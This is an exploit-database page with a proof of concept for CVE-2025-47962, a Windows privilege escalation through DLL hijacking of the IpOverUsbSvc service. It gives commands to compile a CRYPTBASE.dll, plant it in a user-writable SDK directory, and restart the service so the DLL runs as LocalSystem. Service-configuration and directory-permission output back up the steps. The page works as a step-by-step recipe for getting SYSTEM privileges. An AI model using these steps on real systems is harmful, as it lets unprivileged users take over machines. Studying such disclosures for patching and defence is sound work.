## https://sploitus.com/exploit?id=94B44E58-4B20-534D-B7F1-9A48DD530399
# CVE-2025-47962-POC
Reproduction process:
i686-w64-mingw32-gcc -shared -o CRYPTBASE.dll poc.c -lkernel32
copy CRYPTBASE.dll "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\CRYPTBASE.dll"
net stop IpOverUsbSvc
net start IpOverUsbSvc
Explanation:
IpOverUsbSvc
```
sc.exe qc IpOverUsbSvc
SERVICE_NAME: IpOverUsbSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
BINARY_PATH_NAME : "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe"
SERVICE_START_NAME : LocalSystem
```
Runs with LocalSystem privileges. The executable is located in the C:\Microsoft Shared\ directory, over which standard users possess full control permissions.
It has been discovered that ordinary users can write files to the SYSTEM service directory.
Then monitor the DLL
The permissions for the C:\Microsoft Shared\ directory created during Windows SDK installation are improperly configured:
```
C:\Microsoft Shared BUILTIN\Users:(I)(OI)(CI)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(M)
```